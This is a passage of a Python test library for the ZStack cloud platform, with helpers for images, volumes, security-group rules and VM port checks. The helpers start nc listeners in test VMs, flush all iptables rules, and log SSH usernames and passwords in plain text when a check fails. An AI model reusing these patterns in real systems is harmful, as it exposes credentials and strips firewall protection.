if image.name_ == vr_image_name:
return image
def lib_get_image_from_plan(image):
images = deploy_config.images.image
if not isinstance(images, list):
if images.name_ == image.name:
return images
else:
return None
for img in images:
if img.name_ == image.name:
return img
def lib_get_disk_offering_by_name(do_name, session_uuid = None):
conditions = res_ops.gen_query_conditions('name', '=', do_name)
disk_offering = res_ops.query_resource(res_ops.DISK_OFFERING, conditions, \
session_uuid)
if not disk_offering:
test_util.test_logger('Could not find disk offering with [name:]%s ' % do_name)
return None
else:
return disk_offering[0]
#disk_offerings = res_ops.get_resource(res_ops.DISK_OFFERING, session_uuid=None)
#for disk_offering in disk_offerings:
# if disk_offering.name == do_name:
# return disk_offering
def lib_get_images(session_uuid = None):
return res_ops.get_resource(res_ops.IMAGE, session_uuid = session_uuid)
def lib_get_root_images(session_uuid = None):
cond = res_ops.gen_query_conditions('mediaType', '=', 'RootVolumeTemplate')
cond = res_ops.gen_query_conditions('status', '!=', 'Deleted', cond)
return res_ops.query_resource(res_ops.IMAGE, cond, session_uuid)
def lib_get_data_images(session_uuid = None):
cond = res_ops.gen_query_conditions('mediaType', '=', 'DataVolumeTemplate')
return res_ops.query_resource(res_ops.IMAGE, cond, session_uuid)
def lib_get_ISO(session_uuid = None):
cond = res_ops.gen_query_conditions('mediaType', '=', 'ISO')
return res_ops.query_resource(res_ops.IMAGE, cond, session_uuid)
def lib_get_image_by_uuid(image_uuid, session_uuid = None):
condition = res_ops.gen_query_conditions('uuid', '=', image_uuid)
images = res_ops.query_resource(res_ops.IMAGE, condition, session_uuid)
if images:
return images[0]
def lib_get_vm_image(vm_inv, session_uuid = None):
'''
return vm_inv's image template inventory
'''
root_volume_inv = lib_get_root_image_from_vm(vm_inv)
return lib_get_image_by_uuid(root_volume_inv.rootImageUuid, session_uuid)
def lib_get_not_vr_images():
'''
return all images, except the images used by Virtual Router Offerings
'''
images = lib_get_root_images()
vr_offerings = res_ops.query_resource(res_ops.VR_OFFERING, [])
vr_images = []
for vr_offering in vr_offerings:
vr_images.append(vr_offering.imageUuid)
temp_images = list(images)
for img in images:
if img.uuid in vr_images:
temp_images.remove(img)
return temp_images
def lib_get_image_by_desc(img_desc):
images = lib_get_images()
for image in images:
if image.description == img_desc:
return image
def lib_get_image_by_name(img_name):
cond = res_ops.gen_query_conditions('name', '=', img_name)
images = res_ops.query_resource(res_ops.IMAGE, cond)
if images:
return images[0]
test_util.test_logger("not find image with name: %s" % img_name)
return False
def lib_remove_image_from_list_by_desc(images, img_desc):
imgs = images
for image in images:
if image.description == img_desc:
imgs.remove(image)
return imgs
def lib_check_image_db_exist(image):
imgs = lib_get_images()
for img in imgs:
if img.uuid == image.uuid:
test_util.test_logger('[image:] %s is found in zstack database' % img.uuid)
return True
test_util.test_logger('[image:] %s is not found in zstack database' % img.uuid)
return False
#Should depend on backup storage uuid to get host info
def lib_check_backup_storage_image_file(image):
backupStorages = image.backupStorageRefs
bs_one = backupStorages[0]
bs = lib_get_backup_storage_by_uuid(bs_one.backupStorageUuid)
image_url = bs_one.installPath
host = lib_get_backup_storage_host(bs.uuid)
if hasattr(inventory, 'IMAGE_STORE_BACKUP_STORAGE_TYPE') and bs.type == inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
image_info = image_url.split('://')[1].split('/')
image_url = '%s/registry/v1/repos/public/%s/manifests/revisions/%s' \
% (bs.url, image_info[0], image_info[1])
return lib_check_file_exist(host, image_url)
elif bs.type == inventory.SFTP_BACKUP_STORAGE_TYPE:
return lib_check_file_exist(host, image_url)
test_util.test_logger('Did not find suitable checker for bs: %s, whose type is: %s ' % (bs.uuid, bs.type))
def lib_check_file_exist(host, file_path):
command = 'ls -l %s' % file_path
eout = ''
try:
if host.sshPort != None:
(ret, out, eout) = ssh.execute(command, host.managementIp, host.username, host.password, port=int(host.sshPort))
else:
(ret, out, eout) = ssh.execute(command, host.managementIp, host.username, host.password)
test_util.test_logger('[file:] %s was found in [host:] %s' % (file_path, host.managementIp))
return True
except:
#traceback.print_exc(file=sys.stdout)
test_util.test_logger('Fail to execute: ssh [host:] %s with [username:] %s and [password:] %s to check [file:] %s . This might be expected behavior.'% (host.managementIp, host.username, host.password, file_path))
test_util.test_logger('ssh execution stderr output: %s' % eout)
test_util.test_logger(linux.get_exception_stacktrace())
return False
def lib_check_backup_storage_file_exist(backup_storage, file_path):
command = 'ls -l %s' % file_path
eout = ''
try:
if backup_storage.sshPort != None:
(ret, out, eout) = ssh.execute(command, backup_storage.hostname, backup_storage.username, backup_storage.password, port=backup_storage.sshPort)
else:
(ret, out, eout) = ssh.execute(command, backup_storage.hostname, backup_storage.username, backup_storage.password)
test_util.test_logger('[file:] %s was found in [host:] %s' % (file_path, backup_storage.hostname))
return True
except:
#traceback.print_exc(file=sys.stdout)
test_util.test_logger('Fail to execute: ssh [backup_storage:] %s with [username:] %s and [password:] %s to check [file:] %s . This might be expected behavior.'% (backup_storage.hostname, backup_storage.username, backup_storage.password, file_path))
test_util.test_logger('ssh execution stderr output: %s' % eout)
test_util.test_logger(linux.get_exception_stacktrace())
return False
def lib_check_two_files_md5(host1, file1, host2, file2):
command1 = "md5sum %s" % file1
command2 = "md5sum %s" % file2
(ret, out1, eout) = ssh.execute(command1, host1.managementIp, host1.username, host1.password)
(ret, out2, eout) = ssh.execute(command2, host2.managementIp, host2.username, host2.password)
if out1.split()[0] == out2.split()[0]:
test_util.test_logger('[file1:] %s and [file2:] %s MD5 checksum are same.' % (file1, file2))
return True
else:
test_util.test_logger('[file1:] %s and [file2:] %s MD5 checksum are different' % (file1, file2))
return False
def lib_delete_image(img_uuid, session_uuid=None):
vol_ops.delete_image(img_uuid, session_uuid)
def lib_mkfs_for_volume(volume_uuid, vm_inv):
'''
Will check if the volume's 1st partition is mountable. If not, it will try
to make a partition and create a vfat file system on it.
@params:
volume_uuid: the target volume's uuid
vm_inv: the utility vm, which will help to make fs in volume.
'''
volume = lib_get_volume_by_uuid(volume_uuid)
#Root volume can not be detached.
if volume.type == vol_header.ROOT_VOLUME:
test_util.test_logger("[volume:] %s is Root Volume. It can not be make filesystem." % volume_uuid)
return False
old_vm_uuid = None
if volume.vmInstanceUuid:
old_vm_uuid = volume.vmInstanceUuid
lib_detach_volume(volume_uuid)
lib_attach_volume(volume_uuid, vm_inv.uuid)
mount_point = '/tmp/zstack/mnt'
import tempfile
script_file = tempfile.NamedTemporaryFile(delete=False)
script_file.write('''
mkdir -p %s
device="/dev/`ls -ltr --file-type /dev | awk '$4~/disk/ {print $NF}' | grep -v '[[:digit:]]' | tail -1`"
mount ${device}1 %s
if [ $? -ne 0 ]; then
fdisk $device <<EOF
n
p
1
w
EOF
mkfs.vfat ${device}1
else
umount %s
fi
''' % (mount_point, mount_point, mount_point))
script_file.close()
if not lib_execute_shell_script_in_vm(vm_inv, script_file.name):
test_util.test_fail("make partition and make filesystem operation failed in [volume:] %s in [vm:] %s" % (volume_uuid, vm_inv.uuid))
lib_detach_volume(volume_uuid)
os.unlink(script_file.name)
return False
test_util.test_logger("Successfully make partition and make filesystem operation in [volume:] %s in [vm:] %s" % (volume_uuid, vm_inv.uuid))
lib_detach_volume(volume_uuid)
os.unlink(script_file.name)
if old_vm_uuid:
lib_attach_volume(volume_uuid, old_vm_uuid)
return True
#-----------Snapshot Operations-----------
def lib_get_volume_snapshot_tree(volume_uuid = None, tree_uuid = None, session_uuid = None):
if not volume_uuid and not tree_uuid:
test_util.test_logger("volume_uuid and tree_uuid should not be None at the same time")
return
import apibinding.api_actions as api_actions
action = api_actions.GetVolumeSnapshotTreeAction()
action.volumeUuid = volume_uuid
action.treeUuid = tree_uuid
ret = acc_ops.execute_action_with_session(action, session_uuid).inventories
return ret
#-----------Security Group Operations-------------
def lib_create_security_group(name=None, desc=None, session_uuid=None):
if not name:
name = "Security_Group_Testing"
if not desc:
desc = "Security Group For Testing"
sg_creation_option = test_util.SecurityGroupOption()
sg_creation_option.set_name(name)
sg_creation_option.set_description(desc)
#[Inlined import]
import zstackwoodpecker.zstack_test.zstack_test_security_group as zstack_sg_header
sg = zstack_sg_header.ZstackTestSecurityGroup()
sg.set_creation_option(sg_creation_option)
sg.create()
return sg
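#A minimal usage sketch (not part of the original library): create an SG,
#attach it to the L3 network of the vm's first nic, add an ingress rule and
#bind the nic to the SG. The target ip for the rule is a hypothetical
#placeholder.
def _example_create_and_apply_sg(vm_inv):
    sg = lib_create_security_group(name='example_sg')
    sg_uuid = sg.get_security_group().uuid
    nic = vm_inv.vmNics[0]
    lib_attach_security_group_to_l3_by_nic(sg_uuid, nic)
    rule = lib_gen_sg_rule(Port.rule1_ports, inventory.TCP, inventory.INGRESS, '10.0.1.8')
    lib_add_sg_rules(sg_uuid, [rule])
    lib_add_nic_to_sg(sg_uuid, [nic.uuid])
    return sg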
def lib_delete_security_group(sg_uuid, session_uuid=None):
return net_ops.delete_security_group(sg_uuid, session_uuid)
def lib_add_sg_rules(sg_uuid, rules, session_uuid=None):
return net_ops.add_rules_to_security_group(sg_uuid, rules, session_uuid)
def lib_remove_sg_rules(rules, session_uuid=None):
return net_ops.remove_rules_from_security_group(rules, session_uuid)
def lib_add_nic_to_sg(sg_uuid, vm_nics, session_uuid=None):
return net_ops.add_nic_to_security_group(sg_uuid, vm_nics, session_uuid)
def lib_remove_nic_from_sg(sg_uuid, nic_uuid, session_uuid=None):
return net_ops.remove_nic_from_security_group(sg_uuid, [nic_uuid], \
session_uuid)
def lib_attach_security_group_to_l3(sg_uuid, l3_uuid, session_uuid=None):
return net_ops.attach_security_group_to_l3(sg_uuid, l3_uuid, session_uuid)
def lib_detach_security_group_from_l3(sg_uuid, l3_uuid, session_uuid=None):
return net_ops.detach_security_group_from_l3(sg_uuid, l3_uuid, session_uuid)
def lib_attach_security_group_to_l3_by_nic(sg_uuid, vm_nic, session_uuid=None):
l3_uuid = vm_nic.l3NetworkUuid
lib_attach_security_group_to_l3(sg_uuid, l3_uuid, session_uuid)
def lib_has_rule_in_sg(sg_inv, protocol=None, target_ip=None, direction=None, port=None):
for rule in sg_inv.rules:
if protocol and not rule.protocol == protocol:
continue
if target_ip and not rule.allowedCidr == (target_ip + '/32'):
continue
if direction and not rule.type == direction:
continue
if port and not rule.port == port:
continue
        return True
    return False
def lib_get_sg_invs_by_nic_uuid(nic_uuid):
    '''
    Get all SG inventories related with nic_uuid
    '''
conditions = res_ops.gen_query_conditions('vmNicUuid', '=', nic_uuid)
sg_nics = res_ops.query_resource(res_ops.VM_SECURITY_GROUP, conditions)
if not sg_nics:
return False
sg_invs = []
for sg_nic in sg_nics:
sg_uuid = sg_nic.securityGroupUuid
conditions = res_ops.gen_query_conditions('uuid', '=', sg_uuid)
sg = res_ops.query_resource(res_ops.SECURITY_GROUP, conditions)[0]
sg_invs.append(sg)
return sg_invs
def lib_is_sg_rule_exist(nic_uuid, protocol=None, target_ip=None, direction=None, port=None):
sg_invs = lib_get_sg_invs_by_nic_uuid(nic_uuid)
if sg_invs:
return lib_is_sg_rule_exist_in_sg_invs(sg_invs, protocol=protocol, target_ip=target_ip, direction=direction, port=port)
def lib_is_sg_rule_exist_in_sg_invs(sg_invs, protocol=None, target_ip=None, direction=None, port=None):
if not sg_invs:
return False
for sg in sg_invs:
if not sg.rules:
continue
if not protocol and not target_ip and not direction and not port:
return True
if lib_has_rule_in_sg(sg, protocol, target_ip, direction, port):
return True
return False
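#A minimal usage sketch (not part of the original library): assert that an
#ingress TCP rule for target_ip exists on at least one SG attached to the
#vm's first nic.
def _example_assert_ingress_rule(vm_inv, target_ip):
    nic_uuid = vm_inv.vmNics[0].uuid
    if not lib_is_sg_rule_exist(nic_uuid, protocol=inventory.TCP, \
            target_ip=target_ip, direction=inventory.INGRESS):
        test_util.test_fail('expected ingress TCP rule for [ip:] %s was not found' % target_ip)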
#assume vm is behind vr. The vr image is assumed to have the required commands, e.g. nc, telnet, ssh etc. We will use nc to open vm's ports.
#will check and open all ports for vm
def lib_open_vm_listen_ports(vm, ports, l3_uuid=None):
if not l3_uuid:
target_ip = vm.vmNics[0].ip
else:
for nic in vm.vmNics:
if nic.l3NetworkUuid == l3_uuid:
target_ip = nic.ip
break
else:
test_util.test_fail("Can not find [vm:] %s IP for [l3 uuid:] %s. Can not open ports for it." % (vm.uuid, l3_uuid))
lib_check_nc_exist(vm, l3_uuid)
flush_iptables_cmd = 'iptables -F; iptables -F -t nat'
test_util.test_logger("Flush iptables rules")
test_result = lib_execute_command_in_vm(vm, flush_iptables_cmd)
target_ports = ' '.join(str(port) for port in ports)
port_checking_cmd = 'result=""; for port in `echo %s`; do echo "hello" | nc -w1 %s $port >/dev/null 2>&1; if [ $? -eq 0 ]; then result="${result}0";else result="${result}1"; (nohup nc -k -l %s $port >/dev/null 2>&1 </dev/null &); fi ; done; echo $result' % (target_ports, target_ip, target_ip)
test_util.test_logger("Doing opening vm port operations, might need 1 min")
test_result = lib_execute_command_in_vm(vm, port_checking_cmd)
if not test_result:
test_util.test_fail("check [vm:] %s ports failure. Please check the failure information. " % vm.uuid)
test_result = test_result.strip()
if len(ports) != len(test_result):
test_util.test_fail("open/check vm ports failure. Expected to get %s results, but get %s results: %s." % (len(ports), len(test_result), test_result))
test_util.test_logger("Has open all [ports:] %s for [vm:] %s [ip:] %s" % (ports, vm.uuid, target_ip))
def lib_check_nc_exist(vm, l3_uuid=None):
if not l3_uuid:
target_ip = vm.vmNics[0].ip
else:
for nic in vm.vmNics:
if nic.l3NetworkUuid == l3_uuid:
target_ip = nic.ip
break
else:
test_util.test_fail("Can not find [vm:] %s IP for [l3 uuid:] %s. Can not open ports for it." % (vm.uuid, l3_uuid))
nc_checking_cmd = "which nc"
test_result = lib_execute_command_in_vm(vm, nc_checking_cmd)
if not test_result:
        test_util.test_fail('Test [vm:] %s does not have command "nc" for testing.' % vm.uuid)
#assume vm is behind vr. The vr image is assumed to have the required commands, e.g. nc, telnet, ssh etc. We will use nc to open vm's port.
def lib_open_vm_listen_port(vm, port, l3_uuid=None):
if not l3_uuid:
target_ip = vm.vmNics[0].ip
else:
for nic in vm.vmNics:
if nic.l3NetworkUuid == l3_uuid:
target_ip = nic.ip
break
else:
test_util.test_fail("Can not find [vm:] %s IP for [l3 uuid:] %s. Can not open ports for it." % (vm.uuid, l3_uuid))
lib_check_nc_exist(vm, l3_uuid)
    open_port_cmd = 'nohup nc -k -l %s %s >/dev/null 2>&1 </dev/null &' % (target_ip, port)
test_result = lib_execute_command_in_vm(vm, open_port_cmd)
if not test_result:
test_util.test_fail('cannot execute test ssh [command:] %s in test vm: %s. ' % (open_port_cmd, vm.uuid))
    test_util.test_logger('has opened [port:] %s on [vm:] %s [ip:] %s' % (port, vm.uuid, target_ip))
return True
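#A minimal usage sketch (not part of the original library): open a group of
#listening ports on dst_vm, then check that src_vm can reach the allowed ones
#and is blocked on the denied ones. The port numbers are hypothetical.
def _example_open_and_check_ports(src_vm, dst_vm):
    allowed_ports = [22, 80]    #hypothetical ports opened and allowed by SG
    denied_ports = [8080]       #hypothetical port opened but denied by SG
    lib_open_vm_listen_ports(dst_vm, allowed_ports + denied_ports)
    lib_check_vm_ports(src_vm, dst_vm, allowed_ports, denied_ports)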
def lib_check_vm_port(src_vm, dst_vm, port):
    '''
    lib_check_vm_port could use either the vr or the native host to check dst_vm's port connection from src_vm.
    The vr image or the native host is assumed to have the required commands installed, e.g. nc, telnet, ssh etc.
    '''
print "connect %s : %s from %s" % (dst_vm.uuid, port, src_vm.uuid)
vr_vm = lib_find_vr_by_vm(src_vm)
target_ip = dst_vm.vmNics[0].ip
    #telnet might wait up to 1 min before timing out.
cmd = 'echo "quit" | telnet %s %s|grep "Escape character"' % (target_ip, port)
#cmd = 'echo "hello"|nc -w 1 %s %s' % (target_ip, port)
ret = True
if vr_vm[0].uuid == src_vm.uuid:
try:
src_vm_ip = lib_find_vr_mgmt_ip(src_vm)
lib_install_testagent_to_vr_with_vr_vm(src_vm)
vr_vm = src_vm
except:
test_util.test_logger("[vm:] %s is not a VR or behind any VR. Can't connect to it to test [vm:] %s [port:] %s" % (src_vm.uuid, dst_vm.uuid, port))
return False
shell_cmd = host_plugin.HostShellCmd()
shell_cmd.command = cmd
rspstr = http.json_dump_post(testagent.build_http_path(src_vm_ip, host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
rsp = jsonobject.loads(rspstr)
if rsp.return_code != 0:
ret = False
test_util.test_logger('shell error info: %s' % rsp.stderr)
else:
vr_vm = vr_vm[0]
if TestHarness == TestHarnessHost:
test_harness_ip = lib_find_host_by_vm(src_vm).managementIp
#assign host l2 bridge ip.
lib_set_vm_host_l2_ip(src_vm)
else:
test_harness_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
src_vm_ip = src_vm.vmNics[0].ip
username = lib_get_vr_image_username(vr_vm)
password = lib_get_vr_image_password(vr_vm)
rsp = lib_ssh_vm_cmd_by_agent(test_harness_ip, src_vm_ip, username, \
password, cmd)
if not rsp.success:
ret = False
if ret:
test_util.test_logger('Successfully connect [vm:] %s [ip:] %s [port:] %s from [vm:] %s' % (dst_vm.uuid, target_ip, port, src_vm_ip))
return True
else:
        test_util.test_logger('Fail to connect [vm:] %s [ip:] %s [port:] %s from [vm:] %s' % (dst_vm.uuid, target_ip, port, src_vm_ip))
return False
def lib_check_vm_ports_in_a_command(src_vm, dst_vm, allowed_ports, denied_ports):
    '''
    Check the connectivity of a group of VM ports within 1 ssh command.
    '1' means connection refused. '0' means connection success.
    '''
common_l3 = lib_find_vms_same_l3_uuid([src_vm, dst_vm])
target_ip = lib_get_vm_nic_by_l3(dst_vm, common_l3).ip
src_ip = lib_get_vm_nic_by_l3(src_vm, common_l3).ip
test_util.test_logger("[target vm:] %s [ip:] %s" % (dst_vm.uuid, target_ip))
lib_check_ports_in_a_command(src_vm, src_ip, target_ip, allowed_ports, denied_ports, dst_vm, common_l3)
def lib_check_ports_in_a_command(src_vm, src_ip, target_ip, allowed_ports, \
denied_ports, dst_vm, l3_uuid=None):
    '''
    Check target_ip ports connectivity from src_ip.
    If the allowed_ports are not connectable, or the denied_ports are
    connectable, it will raise an exception.
    '''
all_ports = allowed_ports + denied_ports
target_ports = ' '.join(str(port) for port in (allowed_ports + denied_ports))
    expected_result = ''.join(str(0) for item in allowed_ports) + ''.join(str(1) for item in denied_ports)
    #This is the old script that did serial port checking.
#port_checking_cmd = 'result=""; for port in `echo %s`; do echo "hello" | nc -w1 %s $port >/dev/null 2>&1; if [ $? -ne 0 ]; then result="${result}1";else result="${result}0"; fi ; done; echo $result' % (target_ports, target_ip)
    #The script below is optimized to finish in about 2 seconds. We found that
    # nc sometimes takes more than 1 second to return, although we set -w1
#{ echo "hello" | nc -w1 %s $1 ; \
#{ echo "hello" | nc -w1 %s $1 >/dev/null 2>&1 ; \
port_checking_cmd = '\
check_port()\
{ echo "hello" | nc -w1 %s $1 >/dev/null 2>&1 ; \
echo $? > /tmp/port_$1; \
} ; \
result=""; \
for port in `echo %s`; \
do rm -f /tmp/port_$port; \
(check_port $port &); \
done; \
sleep 2; \
for port in `echo %s`; \
do if [ -f /tmp/port_$port ]; \
then result=$result`cat /tmp/port_$port`; \
else result="${result}2"; \
fi; \
done; \
echo $result > /tmp/result_`date +%%s`; \
echo $result' \
% (target_ip, target_ports, target_ports)
test_util.test_logger("Doing port checking, might need 1 min or longer.")
test_result = lib_execute_command_in_vm(src_vm, port_checking_cmd, l3_uuid)
if not test_result:
test_util.test_fail("check [ip:] %s ports failure. Please check the failure information. " % target_ip)
test_result = test_result.strip()
if len(expected_result) != len(test_result):
test_util.test_fail("check vm ports failure. Expected to get %s results: %s, but get %s results: %s. The checking ports are: %s" % (len(expected_result), expected_result, len(test_result), test_result, target_ports))
else:
test_util.test_logger("Expected to get results: %s, and get results: %s.The checking ports are: %s" % (expected_result, test_result, target_ports))
for i in range(len(expected_result)):
if expected_result[i] == test_result[i]:
if expected_result[i] == '0':
test_util.test_logger('(Expected result:) Successfully connect [vm:] %s [ip:] %s [port:] %s from [vm:] %s [ip:] %s' % (dst_vm.uuid, target_ip, all_ports[i], src_vm.uuid, src_ip))
else:
test_util.test_logger('(Expected result:) Fail to connect [vm:] %s [ip:] %s [port:] %s from [vm:] %s [ip:] %s' % (dst_vm.uuid, target_ip, all_ports[i], src_vm.uuid, src_ip))
else:
src_vm_nic_id = 'vnic%s.x-out' % lib_get_vm_internal_id(src_vm)
dst_vm_nic_id = 'vnic%s.x-in' % lib_get_vm_internal_id(dst_vm)
            if expected_result[i] == '0':
                test_util.test_fail("(network port checking error:) [vm:] %s [ip:] %s [port:] %s [vnic id:] %s is not connectable from [vm:] %s [ip:] %s [vnic id:] %s. Expected: connection success." % (dst_vm.uuid, target_ip, all_ports[i], dst_vm_nic_id, src_vm.uuid, src_ip, src_vm_nic_id))
            else:
                test_util.test_fail("(network port checking error:) [vm:] %s [ip:] %s [port:] %s [vnic id:] %s is connectable from [vm:] %s [ip:] %s [vnic id:] %s. Expected: connection failed." % (dst_vm.uuid, target_ip, all_ports[i], dst_vm_nic_id, src_vm.uuid, src_ip, src_vm_nic_id))
def lib_check_vm_ports(src_vm, dst_vm, allowed_ports, denied_ports):
test_util.test_logger("Following ports should be allowed to access from [vm] %s to [vm] %s : %s" % (src_vm.uuid, dst_vm.uuid, allowed_ports))
test_util.test_logger("Following ports should be denied to access from [vm] %s to [vm] %s : %s" % (src_vm.uuid, dst_vm.uuid, denied_ports))
    #Do all operations in 1 command
lib_check_vm_ports_in_a_command(src_vm, dst_vm, allowed_ports, denied_ports)
return True
    #The per-port checking below is unreachable because of the early return
    # above; it is kept for reference. Checking port by port would trigger a
    # lot of ssh connections.
for port in allowed_ports:
if not lib_check_vm_port(src_vm, dst_vm, port):
test_util.test_fail("Network port checking error: [vm:] %s [port:] %s is not connectable from [vm:] %s ." % (dst_vm.uuid, port, src_vm.uuid))
for port in denied_ports:
if lib_check_vm_port(src_vm, dst_vm, port):
test_util.test_fail("Network port checking error: [vm:] %s [port:] %s is connectable from [vm:] %s ." % (dst_vm.uuid, port, src_vm.uuid))
def lib_check_src_vm_group_ports(src_vms, dst_vm, allowed_ports, denied_ports):
for src_vm in src_vms:
lib_check_vm_ports(src_vm, dst_vm, allowed_ports, denied_ports)
if len(src_vms) > 1:
for nsrc_vm in src_vms:
for src_vm in src_vms:
if nsrc_vm != src_vm:
lib_check_vm_ports(nsrc_vm, src_vm, allowed_ports, denied_ports)
def lib_check_dst_vm_group_ports(src_vm, dst_vms, allowed_ports, denied_ports):
for dst_vm in dst_vms:
        lib_check_vm_ports(src_vm, dst_vm, allowed_ports, denied_ports)
if len(dst_vms) > 1:
for nsrc_vm in dst_vms:
for dst_vm in dst_vms:
if nsrc_vm != dst_vm:
lib_check_vm_ports(nsrc_vm, dst_vm, allowed_ports, denied_ports)
def lib_check_vm_group_ports(src_vms, dst_vms, allowed_ports, denied_ports):
if isinstance(src_vms, list):
for src_vm in src_vms:
lib_check_vm_ports(src_vm, dst_vms, allowed_ports, denied_ports)
if len(src_vms) > 1:
for nsrc_vm in src_vms:
for src_vm in src_vms:
if nsrc_vm != src_vm:
lib_check_vm_ports(nsrc_vm, src_vm, allowed_ports, denied_ports)
if isinstance(dst_vms, list):
for dst_vm in dst_vms:
lib_check_vm_ports(src_vms, dst_vm, allowed_ports, denied_ports)
if len(dst_vms) > 1:
for nsrc_vm in dst_vms:
for dst_vm in dst_vms:
if nsrc_vm != dst_vm:
lib_check_vm_ports(nsrc_vm, dst_vm, allowed_ports, denied_ports)
def lib_get_sg_rule_by_uuid(rule_uuid, session_uuid=None):
conditions = res_ops.gen_query_conditions('uuid', '=', rule_uuid)
sg_rules = res_ops.query_resource(res_ops.SECURITY_GROUP_RULE, conditions)
if sg_rules:
return sg_rules[0]
def lib_get_sg_rule(sg_uuid, rule=None, session_uuid=None):
    '''
    Get a security group rule by sg_uuid and a rule object. The rule object is
    like a rule inventory.
    '''
conditions = res_ops.gen_query_conditions('uuid', '=', sg_uuid)
sg = res_ops.query_resource(res_ops.SECURITY_GROUP, conditions)[0]
sg_rules = sg.rules
if rule == None:
return sg_rules
for sg_rule in sg_rules:
if sg_rule.type == rule.type and sg_rule.protocol == rule.protocol and sg_rule.allowedCidr == rule.allowedCidr and sg_rule.startPort == rule.startPort and sg_rule.endPort == rule.endPort:
return sg_rule
def lib_get_sg_direction_rules(sg_uuid, direction, session_uuid=None):
sg = res_ops.get_resource(res_ops.SECURITY_GROUP, session_uuid, uuid=sg_uuid)[0]
rules = []
for sg_rule in sg.rules:
if sg_rule.type == direction:
rules.append(sg_rule)
return rules
def lib_gen_sg_rule(port, protocol, type, addr):
    '''
    Will return a rule object built from the given parameters.
    port: rule key, like Port.rule1_ports
    '''
startPort, endPort = Port.get_start_end_ports(port)
rule = inventory.SecurityGroupRuleAO()
rule.allowedCidr = '%s/32' % addr
rule.endPort = endPort
rule.startPort = startPort
rule.protocol = protocol
rule.type = type
return rule
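#A minimal usage sketch (not part of the original library): build an ingress
#and an egress rule for the same target ip and add both to an SG in one call.
#Port.rule1_ports is the rule key named in the docstring above.
def _example_add_bidirectional_rules(sg_uuid, target_ip):
    ingress_rule = lib_gen_sg_rule(Port.rule1_ports, inventory.TCP, \
            inventory.INGRESS, target_ip)
    egress_rule = lib_gen_sg_rule(Port.rule1_ports, inventory.TCP, \
            inventory.EGRESS, target_ip)
    lib_add_sg_rules(sg_uuid, [ingress_rule, egress_rule])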
def lib_get_sg_rule_uuid_by_rule_obj(sg_uuid, rules, session_uuid=None):
sg = res_ops.get_resource(res_ops.SECURITY_GROUP, session_uuid, uuid=sg_uuid)[0]
target_rules = []
sg_rules = sg.rules
for rule in rules:
for sg_rule in sg_rules:
if sg_rule.type == rule.type and sg_rule.protocol == rule.protocol and sg_rule.allowedCidr == rule.allowedCidr and sg_rule.startPort == rule.startPort and sg_rule.endPort == rule.endPort:
target_rules.append(sg_rule.uuid)
test_util.test_logger('find sg [rule:] %s' % sg_rule.uuid)
break
if len(target_rules) != len(rules):
        test_util.test_logger('Required to delete %s rules, but found %s rules in database' % (len(rules), len(target_rules)))
return target_rules
def lib_delete_rule_from_sg(sg_uuid, rules, session_uuid=None):
target_rules = lib_get_sg_rule_uuid_by_rule_obj(sg_uuid, rules, session_uuid)
if target_rules:
lib_remove_sg_rules(target_rules)
def lib_check_vm_pf_rule_exist_in_iptables(pf_rule):
'''
Check if vm pf rule is set in vm's VR.
@params:
pf_rule: the pf inventory
'''
test_util.test_logger('Begin to test [Port Forwarding:] %s ' % pf_rule.uuid)
vr = lib_find_vr_by_vm_nic(lib_get_nic_by_uuid(pf_rule.vmNicUuid))
check_string1 = pf_rule.allowedCidr
if pf_rule.protocolType == inventory.TCP:
check_string2 = '-p tcp'
else:
check_string2 = '-p udp'
if vr.applianceVmType == 'vrouter':
check_string3 = '--dports %s:%s' % (pf_rule.vipPortStart, pf_rule.vipPortEnd)
check_cmd = "sudo iptables-save| grep -Fe '%s'|grep -Fe '%s'|grep -Fe '%s'" % (check_string1, check_string2, check_string3)
else:
check_string3 = '--dport %s:%s' % (pf_rule.vipPortStart, pf_rule.vipPortEnd)
check_cmd = "iptables-save| grep -Fe '%s'|grep -Fe '%s'|grep -Fe '%s'" % (check_string1, check_string2, check_string3)
lib_install_testagent_to_vr_with_vr_vm(vr)
vr_ip = lib_find_vr_mgmt_ip(vr)
shell_cmd = host_plugin.HostShellCmd()
shell_cmd.command = check_cmd
rspstr = http.json_dump_post(testagent.build_http_path(vr_ip, \
host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
rsp = jsonobject.loads(rspstr)
if rsp.return_code == 0:
test_util.test_logger('shell cmd result: %s' % rsp.stdout)
test_util.test_logger('Find [port forwarding:] %s rule on [vr:] %s iptables' % (pf_rule.uuid, vr.uuid))
return True
else:
test_util.test_logger('shell error info: %s' % rsp.stderr)
test_util.test_logger('Can not find [port forwarding:] %s rule on [vr:] %s iptables' % (pf_rule.uuid, vr.uuid))
return False
def lib_check_vm_sg_rule_exist_in_iptables(vm, rule_type=None, \
special_string=None, additional_string=None):
    '''
    rule_type = 'ingress' or 'egress'
    If special_string is not None, the test will only grep special_string for
    the vm sg rule and skip all other params including additional_string.
    If special_string is None and additional_string is not None, the test
    will grep the additional string, besides the common vm and rule_type.
    '''
if rule_type == inventory.INGRESS:
rule = 'in'
elif rule_type == inventory.EGRESS:
rule = 'out'
else:
rule = ''
if not special_string:
if additional_string:
cmd = "nic_id=`virsh dumpxml %s|grep internalId|awk -F'>' '{print $2}'|awk -F'<' '{print $1}'`; iptables-save |grep vnic${nic_id}.0-%s |grep -Fe '%s'" % (vm.uuid, rule, additional_string)
else:
cmd = "nic_id=`virsh dumpxml %s|grep internalId|awk -F'>' '{print $2}'|awk -F'<' '{print $1}'`; iptables-save |grep vnic${nic_id}.0-%s" % (vm.uuid, rule)
else:
cmd = "iptables-save |grep -Fe '%s'" % special_string
host_ip = lib_find_host_by_vm(vm).managementIp
shell_cmd = host_plugin.HostShellCmd()
shell_cmd.command = cmd
rspstr = http.json_dump_post(testagent.build_http_path(host_ip, host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
rsp = jsonobject.loads(rspstr)
if rsp.return_code == 0:
test_util.test_logger('shell cmd result: %s' % rsp.stdout)
test_util.test_logger('Find [vm:] %s related security rules on [host:] %s iptables' % (vm.uuid, host_ip))
return True
else:
test_util.test_logger('shell error info: %s' % rsp.stderr)
#test_util.test_logger('shell command: %s' % rsp.command)
test_util.test_logger('Can not find [vm:] %s related security rules on [host:] %s iptables' % (vm.uuid, host_ip))
return False
def lib_execute_random_sg_rule_operation(test_dict, target_vm, cre_vm_opt):
sg_vm = test_dict.get_sg_vm()
